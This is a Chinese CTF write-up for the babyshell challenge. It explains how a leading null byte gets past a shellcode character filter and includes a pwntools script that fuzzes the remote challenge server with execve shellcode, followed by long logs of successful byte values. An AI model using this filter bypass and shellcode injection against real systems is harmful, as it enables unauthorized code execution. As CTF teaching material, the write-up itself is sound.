buuctf starctf_2019_babyshell

今天做题时候发现一个很有意思的题目，我们输入shellcode，然后满足指定条件之后就可以执行shellcode，一般思路就是在限定条件下拼凑shellcode；但是网上有个很巧妙的方案绕过检查，之后直接使用pwntools内置的shellcode就可以拿到shell，简单记录下这个方案

checksec

checksec starctf_2019_babyshell
[*] '/home/fuzz/Desktop/ctf/starctf_2019_babyshell'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

漏洞函数

main函数如下

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  _BYTE *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8();
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}

sub_4007F8();函数是初始化的，不用管；sub_400786是检查shellcode是不是在这些内容里

__int64 __fastcall sub_400786(_BYTE *a1)
{
  const char *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = aZzjLovesShellC; *i && *i != *a1; ++i )// ZZJ loves shell_code,and here is a gift:
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}

wp

参考这篇文章“汇编语言中0x00的妙用”我们可以使用0x00绕过检查函数，我们需要找到一些包含0x00的shellcode，并且这些shellcode必须不影响后续shellcode执行

link:https://blog.csdn.net/A951860555/article/details/120043354

这里介绍的方法是使用pwn disasm找到这些可用的opcode，很显然这个·004200·不是惟一的方案

pwn disasm -c amd64 004200
   0:    00 42 00                 add    BYTE PTR [rdx+0x0],  al

我们可以使用fuzz的方式测试下究竟哪些字节可以，使用下面的脚本

from pwn import*
context.arch="amd64"
success_list = []
# context(log_level='debug',arch='amd64', os='linux')
p=remote('node5.buuoj.cn',27030)
for first_byte in range(0x01, 0x100):
    try:
        pay=bytes([0x00,first_byte])+asm(shellcraft.execve("/bin/ls"))
        p.sendafter('plz:', pay)
        time.sleep(0.5)
        # p.send('ls')
        # data = p.recv()
        data2 = p.recvlines(10)
        print(f'data:{data2}')
        if b'flag' in data2:
            print(f'success:{hex(first_byte)}')
            success_list.append(first_byte)
        p.close()
    except:
        p = remote('node5.buuoj.cn', 27030)

print(f'success_list:{success_list}')

得到下面的结果

[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xca
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xcc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xce
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xd8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xda
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xdc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xde
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xe8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xea
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xec
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xee
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf2
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf4
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf6
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xf8
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfa
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfc
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xfe
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done

success_list:['0x2', '0x6', '0xa', '0xe', '0x12', '0x16', '0x1a', '0x1e', '0x22', '0x26', '0x2a', '0x2e', '0x32', '0x36', '0x3a', '0x3e', '0xc0', '0xc2', '0xc4', '0xc6', '0xc8', '0xca', '0xcc', '0xce', '0xd0', '0xd2', '0xd4', '0xd6', '0xd8', '0xda', '0xdc', '0xde', '0xe0', '0xe2', '0xe4', '0xe6', '0xe8', '0xea', '0xec', '0xee', '0xf0', '0xf2', '0xf4', '0xf6', '0xf8', '0xfa', '0xfc', '0xfe']

我们再试试三字节的可用opcode

pay=bytes([0x00,first_byte, 0x00]) + asm(shellcraft.execve("/bin/ls"))

得到下面的结果

data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x42
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x45
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x46
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x47
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x4f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x52
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x55
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x56
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x57
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x5f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x62
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x65
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x66
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x67
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x6f
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x72
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x75
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x76
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x77
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7a
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7d
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7e
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x7f

buuctf starctf_2019_babyshell

checksec

漏洞函数

wp

推荐阅读更多精彩内容